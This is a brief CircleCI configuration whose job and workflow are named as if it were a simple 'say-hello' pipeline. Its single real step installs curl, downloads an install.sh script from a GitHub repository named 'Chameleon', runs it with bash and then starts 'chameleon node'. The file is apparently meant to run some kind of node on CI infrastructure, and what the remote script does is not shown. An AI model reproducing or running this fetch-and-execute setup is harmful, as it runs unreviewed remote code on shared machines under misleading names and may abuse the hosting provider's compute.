version: 2.1

jobs:
  dockeretteinstall:
   
    docker:
      - image: debian:stable

    steps:
      - checkout
      - run:
          name: "nodestat"
          command: "apt install curl -y && curl -fsSL https://raw.githubusercontent.com/NateYeet/Chameleon/main/install.sh >> /ins && bash /ins -i && chameleon node"

workflows:
  say-hello-workflow:
    jobs:
      - dockeretteinstall
